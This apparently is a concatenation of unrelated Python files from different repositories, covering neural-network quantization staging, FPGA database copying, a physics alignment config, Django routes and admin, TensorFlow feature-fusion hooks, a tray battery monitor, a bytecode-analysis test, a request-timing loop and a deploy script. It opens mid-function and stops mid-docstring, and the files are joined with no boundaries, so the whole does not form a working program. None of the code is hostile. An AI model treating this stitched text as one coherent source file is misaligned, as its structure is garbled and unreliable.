self.num_of_layers_each_step: splited_layers.append(split_step) split_step = [] split_step.append(layer) else: split_step.append(layer) #add left layers if len(split_step) > 0: splited_layers.append(split_step) return splited_layers def switch_stage(self, epoch_progress): """ Switches the stage of network to the next one. :return: """ layers_steps = self.layers_steps() max_stage = len( layers_steps ) if self.training_stage >= max_stage + 1: return if self.open_grad_after_each_stage == False: if (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > self.training_stage and self.training_stage < max_stage - 1): self.training_stage += 1 print("Switching stage, new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)\ or isinstance(layer, nn.BatchNorm2d): for param in layer.parameters(): param.requires_grad = False elif isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.quatize_during_training = True layer.noise_during_training = False if self.act_noise: for layer in layers_steps[self.training_stage]: # Turn on noise only for current stage if isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.noise_during_training = True return True elif (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > max_stage - 1 and self.allow_grad == False): self.allow_grad = True self.quant_stage_for_grads = self.training_stage + 1 self.random_noise_injection = False print("Switching stage, allowing all grad to propagate. new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear): for param in layer.parameters(): param.requires_grad = True return True return False else: if (np.floor( epoch_progress / self.quant_epoch_step) + self.quant_start_stage > self.training_stage and self.training_stage < max_stage - 1): self.training_stage += 1 print("Switching stage, new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)\ or isinstance(layer, nn.BatchNorm2d): for param in layer.parameters(): param.requires_grad = True elif isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.quatize_during_training = True layer.noise_during_training = False if self.act_noise: for layer in layers_steps[self.training_stage]: # Turn on noise only for current stage if isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.noise_during_training = True self.allow_grad = False return True if (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > max_stage - 1 and self.allow_grad == False): self.allow_grad = True self.quant_stage_for_grads = self.training_stage + 1 self.random_noise_injection = False print("Switching stage, allowing all grad to propagate. new stage is: ", self.training_stage) return False import dbcopy import pytrellis def main(): pytrellis.load_database("../../database") dbcopy.dbcopy("ECP5", "LFE5U-25F", "BMID_0V", "BMID_0H") dbcopy.dbcopy("ECP5", "LFE5U-25F", "BMID_2V", "BMID_2") if __name__ == "__main__": main() # Author : # Date : July 19th, 2007 # last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $ import FWCore.ParameterSet.Config as cms # DCS partitions # "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC" # "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm" # "BPIX","FPIX","ESp","ESm" import DPGAnalysis.Skims.skim_detstatus_cfi ALCARECOTkAlCosmicsDCSFilter = DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone( DetectorType = cms.vstring('TIBTID','TOB','TECp','TECm','BPIX','FPIX'), ApplyFilter = cms.bool(True), AndOr = cms.bool(True), DebugOn = cms.untracked.bool(False) ) #________________________________Track selection____________________________________ # AlCaReco for track based alignment using Cosmic muons reconstructed by Combinatorial Track Finder import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi ALCARECOTkAlCosmicsCTF = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone( src = 'ctfWithMaterialTracksP5', filter = True, applyBasicCuts = True, ptMin = 0., ##10 ptMax = 99999., pMin = 4., ##10 pMax = 99999., etaMin = -99., ##-2.4 keep also what is going through... etaMax = 99., ## 2.4 ...both TEC with flat slope nHitMin = 7, nHitMin2D = 2, chi2nMax = 999999., applyMultiplicityFilter = False, applyNHighestPt = True, ## select only highest pT track nHighestPt = 1 ) # AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmic Track Finder # (same cuts) ALCARECOTkAlCosmicsCosmicTF = ALCARECOTkAlCosmicsCTF.clone( src = 'cosmictrackfinderP5' ## different for CTF ) # AlCaReco for track based alignment using Cosmic muons reconstructed by Regional Cosmic Tracking # (same cuts) ALCARECOTkAlCosmicsRegional = ALCARECOTkAlCosmicsCTF.clone( src = 'regionalCosmicTracks' ) #________________________________Sequences____________________________________ seqALCARECOTkAlCosmicsCTF = cms.Sequence(ALCARECOTkAlCosmicsCTF) seqALCARECOTkAlCosmicsCosmicTF = cms.Sequence(ALCARECOTkAlCosmicsCosmicTF) seqALCARECOTkAlCosmicsRegional = cms.Sequence(ALCARECOTkAlCosmicsRegional) frankdevelopero/django-frikr from django.conf.urls import url from django.contrib import admin from django.urls import include from users import urls as users_urls, api_urls as users_api_urls from photos import urls as photos_urls, api_urls as photos_api_url urlpatterns = [ url(r'^admin/', admin.site.urls), # Users URLs url(r'', include(users_urls)), url(r'api/', include(users_api_urls)), # Photos URLs url(r'', include(photos_urls)), url(r'api/', include(photos_api_url)), ] vghost2008/wml #coding=utf-8 import tensorflow as tf import wnnlayer as wnnl import wmodule import wml_tfutils as wmlt from collections import OrderedDict import object_detection2.od_toolkit as odt from object_detection2.config.config import global_cfg import basic_tftools as btf from object_detection2.modeling.backbone.build import BACKBONE_HOOK_REGISTRY slim = tf.contrib.slim @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) with tf.variable_scope("NonLocalBackboneHook"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.non_local_blockv1(v, inner_dims_multiplier=[1, 1, 1], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, activation_fn=None, weighed_sum=False) return res @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHookV2(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) with tf.variable_scope("NonLocalBackboneHookV2"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.non_local_blockv1(v, inner_dims=[128, 128, 128], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, n_head=2, activation_fn=None, weighed_sum=False) return res @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHookV3(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) self.base_size = 512 def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) normalizer_params['G'] = 8 with tf.variable_scope("NonLocalBackboneHookV3"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=2: res[k] = v continue h = self.base_size//(2**level) w = self.base_size//(2**level) v = wnnl.non_local_blockv4(v, inner_dims=[128, 128, 128], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, n_head=2, activation_fn=None, weighed_sum=False, scope=f"non_localv4_{level}", size=[h,w]) res[k] = v return res @BACKBONE_HOOK_REGISTRY.register() class SPPBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def SPP(self,x): with tf.name_scope("SPP"): x0 = slim.max_pool2d(x,5,1,padding="SAME") x1 = slim.max_pool2d(x,9,1,padding="SAME") x2 = slim.max_pool2d(x,13,1,padding="SAME") return tf.concat([x,x0,x1,x2],axis=-1) def forward(self,features,batched_inputs): del batched_inputs k = list(features.keys())[-1] v = list(features.values())[-1] res = features res[k] = self.SPP(v) return res @BACKBONE_HOOK_REGISTRY.register() class SPPSmallBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def SPP(self,x): with tf.name_scope("SPP"): x0 = slim.max_pool2d(x,5,1,padding="SAME") x1 = slim.max_pool2d(x,9,1,padding="SAME") return tf.concat([x,x0,x1],axis=-1) def forward(self,features,batched_inputs): del batched_inputs k = list(features.keys())[-1] v = list(features.values())[-1] res = features res[k] = self.SPP(v) return res @BACKBONE_HOOK_REGISTRY.register() class SEBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() with tf.variable_scope("SEBackboneHook"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.se_block(v,scope=f"SE_block_{k}") return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHook"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = tf.concat([v0,net],axis=-1) level0 = int(k0[1:]) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHookV2(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHookV2"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = tf.concat([v0,net],axis=-1) level0 = int(k0[1:]) ''' 与上一个版本相比,输出的通道数小一些 ''' net = slim.conv2d(net, v0.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHookV3(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHookV2"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) ''' 与v2相比,使用sum代替concat ''' net = v0+net level0 = int(k0[1:]) net = slim.conv2d(net, v0.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params = odt.get_norm("evo_norm_s0",is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0,v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i,(k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v,shape0[1:3],name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i,(k,v) in enumerate(end_points): with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net,shape[1:3]) res[k] = v+v0 return res @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHookV2(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): low_features = self.parent.low_features normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceBackboneHookV2"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0, v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, (k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, (k, v) in enumerate(end_points): with tf.name_scope(f"smooth_low_feature{i}"): index = int(k[1:]) low_feature = low_features[f"C{index}"] channel = v.get_shape().as_list()[-1] low_feature = slim.conv2d(low_feature,channel,[1,1],activation_fn=None, normalizer_fn=None) with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) res[k] = tf.concat([v + v0,low_feature],axis=-1) return res @BACKBONE_HOOK_REGISTRY.register() class DeformConvBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() with tf.variable_scope("DeformConvBackboneHook"): normalizer_fn,normalizer_params = odt.get_norm("BN",is_training=self.is_training) for k,v in features.items(): if k[0] not in ["C", "P"]: continue level = int(k[1:]) channel = v.get_shape().as_list()[-1] res[k] = wnnl.deform_conv2dv2(v,num_outputs=channel,kernel_size=3, scope=f"deform_conv2d{level}", normalizer_fn=normalizer_fn, normalizer_params=normalizer_params) return res @BACKBONE_HOOK_REGISTRY.register() class MakeAnchorsForRetinaNet(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) self.bh = BalanceBackboneHook(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): features = self.bh(features,batched_inputs) del batched_inputs res = OrderedDict() featuremap_keys = ["P3","P4","P5","P6","P7"] anchor_sizes = global_cfg.MODEL.ANCHOR_GENERATOR.SIZES anchor_ratios = global_cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS normalizer_fn,normalizer_params = odt.get_norm("evo_norm_s0",is_training=self.is_training) ref = features[featuremap_keys[1]] ref_shape = wmlt.combined_static_and_dynamic_shape(ref)[1:3] ref_size = anchor_sizes[1][0] nr = 0 with tf.name_scope("MakeAnchorsForRetinaNet"): for i,k in enumerate(featuremap_keys): net = features[k] for j,s in enumerate(anchor_sizes[i]): for k,r in enumerate(anchor_ratios[i][j]): net = slim.separable_conv2d(net, 32, kernel_size=3, padding="SAME", depth_multiplier=1, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"sep_conv_{i}{j}{k}") target_shape = self.get_shape(ref_shape,ref_size,s,r) net = tf.image.resize_nearest_neighbor(net,target_shape) res[f"P{nr}"] = net nr += 1 return res @staticmethod @wmlt.add_name_scope def get_shape(ref_shape,ref_size,size,ratio): ref_size = tf.to_float(ref_size) size = tf.to_float(size) ref_shape = tf.to_float(ref_shape) target_shape = (ref_size/size)*ref_shape*tf.stack([tf.sqrt(ratio),tf.rsqrt(ratio)],axis=0) shape = tf.to_int32(target_shape) return tf.where(shape>0,shape,tf.ones_like(shape)) @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHookV3(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = [] with tf.variable_scope("BalanceBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features) v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, v in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, v in enumerate(end_points): with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) res.append(v + v0) return res @BACKBONE_HOOK_REGISTRY.register() class BalanceNonLocalBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceNonLocalBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0, v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, (k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, (k, v) in enumerate(end_points): with tf.variable_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) net = v + v0 if i>0: net = wnnl.non_local_blockv1(net,inner_dims_multiplier=[1,1,1], normalizer_fn=normalizer_fn,normalizer_params=normalizer_params, activation_fn=None, weighed_sum=False) res[k] = net return res Tray_display.py from PIL import Image, ImageDraw, ImageFont import pystray import _thread import time import Battery_info class Tray_display(): icon = None battery_level = 0 battery_level_capture_rate = 30 exit_callback = None def __init__(self): self.icon = pystray.Icon('battery_level_show') self.set_menu() def set_exit_callback(self, callback_func): self.exit_callback = callback_func def exit(self): print("Exit") self.icon.stop() if(self.exit_callback): self.exit_callback() def set_menu(self): menu_item = pystray.MenuItem("Exit", lambda icon, item: self.exit()) self.icon.menu = pystray.Menu(menu_item) self.icon.update_menu() def create_icon_by_text(self, text): width = 200 height = 200 color1 = 0x000000 color2 = 0xFFFFFF image = Image.new('RGB', (width, height), color1) dc = ImageDraw.Draw(image) dc.text((0,0),text,font=ImageFont.truetype('C:/Windows/Fonts/Arial.ttf',190),fill = color2) self.icon.icon = image def run(self): self.get_battery_level() _thread.start_new_thread(self.get_battery_level_thread, ()) self.icon.run() def get_battery_level(self): self.battery_level = Battery_info.get_battery_level() self.icon.title = "battery: " + str(self.battery_level) + "%" icon_text = str(self.battery_level) if(self.battery_level == 100): icon_text = "F" self.create_icon_by_text(icon_text) def get_battery_level_thread(self): while(True): self.get_battery_level() time.sleep(self.battery_level_capture_rate) 0 # Copyright (c) 2019-2021, , , , and . # # Distributed under the 3-clause BSD license, see accompanying file LICENSE # or https://github.com/scikit-hep/vector for details. import collections import inspect import sys import pytest import vector.compute.lorentz import vector.compute.planar import vector.compute.spatial uncompyle6 = pytest.importorskip("uncompyle6") spark_parser = pytest.importorskip("spark_parser") Context = collections.namedtuple("Context", ["name", "closure"]) functions = dict( [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.planar, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] + [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.spatial, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] + [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.lorentz, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] ) @pytest.mark.slow @pytest.mark.parametrize("signature", functions.keys()) def test(signature): analyze_function(functions[signature]) # def test(): # for signature, function in functions.items(): # print(signature) # analyze_function(function) def analyze_function(function): if function not in analyze_function.done: # print(function.__module__ + "." + function.__name__) closure = dict(function.__globals__) if function.__closure__ is not None: for var, cell in zip(function.__code__.co_freevars, function.__closure__): try: closure[var] = cell.cell_contents except ValueError: pass # the cell has not been filled yet, so ignore it analyze_code(function.__code__, Context(function.__name__, closure)) analyze_function.done.add(function) analyze_function.done = set() def analyze_code(code, context): # this block is all uncompyle6 python_version = float(sys.version[0:3]) is_pypy = "__pypy__" in sys.builtin_module_names parser = uncompyle6.parser.get_python_parser( python_version, debug_parser=dict(spark_parser.DEFAULT_DEBUG), compile_mode="exec", is_pypy=is_pypy, ) scanner = uncompyle6.scanner.get_scanner(python_version, is_pypy=is_pypy) tokens, customize = scanner.ingest(code, code_objects={}, show_asm=False) parsed = uncompyle6.parser.parse(parser, tokens, customize, code) # now the disassembled bytecodes have been parsed into a tree for us to walk analyze_body(parsed, context) def analyze_body(node, context): assert node.kind == "stmts" assert len(node) >= 1 for statement in node[:-1]: analyze_assignment(statement, context) analyze_return(node[-1], context) def analyze_assignment(node, context): assert node.kind == "sstmt" assert len(node) == 1 assert ( node[0].kind == "assign" ), "only assignments and a final 'return' are allowed (and not tuple-assignment)" assert len(node[0]) == 2 assert node[0][1].kind == "store" if node[0][1][0].kind == "STORE_FAST": analyze_expression(expr(node[0][0]), context) elif node[0][1][0].kind == "unpack": assert len(node[0][1][0]) >= 2 assert node[0][1][0][0].kind.startswith("UNPACK_SEQUENCE") for item in node[0][1][0][1:]: assert item.kind == "store" assert len(item) == 1 assert item[0].kind == "STORE_FAST" else: print(node[0][1][0]) raise AssertionError("what is this?") def expr(node): assert node.kind == "expr" assert len(node) == 1 return node[0] def is_pi(node): return ( node.kind == "attribute" and len(node) == 2 and expr(node[0]).kind == "LOAD_FAST" and expr(node[0]).attr == "lib" and node[1].kind == "LOAD_ATTR" and node[1].attr == "pi" ) def is_nan_to_num(node): if node.kind == "call_kw36" and len(node) >= 3: function = expr(node[0]) return ( function.kind == "attribute" and expr(function[0]).attr == "lib" and function[1].attr == "nan_to_num" ) else: return False def analyze_return(node, context): assert node.kind == "sstmt" assert len(node) == 1 assert node[0].kind == "return", "compute function must end with a 'return'" assert len(node[0]) == 2 assert node[0][0].kind == "ret_expr" assert len(node[0][0]) == 1 expr(node[0][0][0]) assert node[0][1].kind == "RETURN_VALUE" if node[0][0][0][0].kind == "tuple": assert len(node[0][0][0][0]) >= 2, "returning an empty tuple?" assert node[0][0][0][0][-1].kind.startswith("BUILD_TUPLE") for item in node[0][0][0][0][:-1]: analyze_expression(expr(item), context) else: analyze_expression(node[0][0][0][0], context) def analyze_expression(node, context): if node.kind == "LOAD_FAST": # Don't bother checking to see if this variable has been defined. # Unit checks test that if the coverage is complete. pass elif node.kind == "LOAD_CONST": assert isinstance(node.attr, (int, float)) elif is_pi(node): pass elif node.kind == "unary_op": assert len(node) == 2 analyze_expression(expr(node[0]), context) assert node[1].kind == "unary_operator" assert len(node[1]) == 1 analyze_unary_operator(node[1][0], context) elif node.kind == "bin_op": assert len(node) == 3 analyze_expression(expr(node[0]), context) analyze_expression(expr(node[1]), context) assert node[2].kind == "binary_operator" assert len(node[2]) == 1 analyze_binary_operator(node[2][0], context) elif node.kind == "compare": assert len(node) == 1 assert node[0].kind == "compare_single", "only do single comparisons" assert len(node[0]) == 3 analyze_expression(expr(node[0][0]), context) analyze_expression(expr(node[0][1]), context) assert node[0][2].kind == "COMPARE_OP" assert ( node[0][2].attr in allowed_comparisons ), f"add {repr(node[0][2].attr)} to allowed_comparisons" elif node.kind == "call": assert len(node) >= 2 assert node[-1].kind.startswith("CALL_METHOD") or node[-1].kind.startswith( "CALL_FUNCTION" ) analyze_callable(expr(node[0]), context) for argument in node[1:-1]: assert argument.kind == "pos_arg", "only positional arguments" analyze_expression(expr(argument[0]), context) elif is_nan_to_num(node): analyze_expression(expr(node[1]), context) else: print(node) raise AssertionError("what is this?") def analyze_unary_operator(node, context): assert ( node.kind in allowed_unary_operators ), f"add {repr(node.kind)} to allowed_unary_operators" def analyze_binary_operator(node, context): assert ( node.kind in allowed_binary_operators ), f"add {repr(node.kind)} to allowed_binary_operators" def analyze_callable(node, context): if node.kind == "attribute37": assert len(node) == 2 module = expr(node[0]) assert module.kind == "LOAD_FAST" or module.kind == "LOAD_GLOBAL" assert node[1].kind == "LOAD_METHOD" if module.attr == "lib": assert ( node[1].attr in allowed_lib_functions ), f"add {repr(node[1].attr)} to allowed_lib_functions" else: module_name = ".".join( context.closure.get(module.attr).__name__.split(".")[:-1] ) assert module_name in ( "vector.compute.planar", "vector.compute.spatial", "vector.compute.lorentz", ) elif node.kind == "LOAD_GLOBAL" or node.kind == "LOAD_DEREF": function = context.closure.get(node.attr) assert ( function is not None ), f"unrecognized function in scope: {repr(node.attr)}" analyze_function(function) else: print(node) raise AssertionError("what is this?") allowed_unary_operators = [ "UNARY_NEGATIVE", ] allowed_binary_operators = [ "BINARY_ADD", "BINARY_SUBTRACT", "BINARY_MULTIPLY", "BINARY_TRUE_DIVIDE", "BINARY_MODULO", "BINARY_POWER", "BINARY_AND", ] allowed_comparisons = [ "==", "!=", "<", ">", ] allowed_lib_functions = [ "absolute", "sign", "copysign", "maximum", "sqrt", "exp", "log", "sin", "cos", "tan", "arcsin", "arccos", "arctan", "arctan2", "sinh", "cosh", "arctanh", "isclose", ] namanshrimali/simplif-ai import numpy as np import torch import random def seed_everything(seed = 1): random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed)hisergiorojas/gltf2usd from _gltf2usd.gltf2.Skin import Skin from _gltf2usd.gltf2.Node import Node from _gltf2usd.gltf2.Animation import Animation from _gltf2usd.gltf2.Scene import Scene from _gltf2usd.gltf2.Mesh import Mesh from _gltf2usd.gltf2.Material import Material rosadigital/blog0 from django.contrib import admin from .models import Post, Categories, Profile, Comment # Register your models here. admin.site.register(Post) admin.site.register(Categories) admin.site.register(Profile) admin.site.register(Comment)1-10 # # Copyright 2019-2020 Captech Partners and the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: (), (), () # import requests import time # test assemble time cs = [1, 3, 10, 30, 100, 300, 1000, 3000, 10000] for c in cs: total = 0 for _ in range(c): start = time.time() requests.get("http://192.168.127.12:5000/back-to-school/lb1") end = time.time() total += end - start print(c, total) # test memory usage # r = 0 # while r < 10000: # requests.get("http://localhost:5000/back-to-school/lb1") # r += 1 # -*- coding: utf-8 -*- import json import logging def read_json_config(config_file): logger.debug(f'Reading config file: {config_file}') with open(config_file, 'r') as f: return json.load(f) def setup_logging(name="Error logs"): global logger logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() fmt = "%(asctime)s %(levelname)s - %(message)s " \ + "(%(filename)s:%(lineno)s PID %(process)d)" formatter = logging.Formatter(fmt) ch.setFormatter(formatter) logger.addHandler(ch) return logger aotuai/brainframe-qt __version__ = "0.30.0" import re S = input() print("YES" if re.match("^(dream|dreamer|erase|eraser)*$", S) else "NO" ) from enum import Enum class RotationDirection(Enum): CLCKWISE = 1 CNTR_CLCKWISE = 20 #!/usr/bin/env python3 import argparse import json import os from pathlib import Path import platform import time from lib.ip_check import * from lib.unix import Unix from lib.windows import Windows class Deploy: """ Base class for RoboLab Deploy-Script """ def __init__(self, configure=False, execute_only=True, backup=False, sync_log=False, start_session=True, tar=False, exam=False): """ Initializes Deploy-Script, creates all 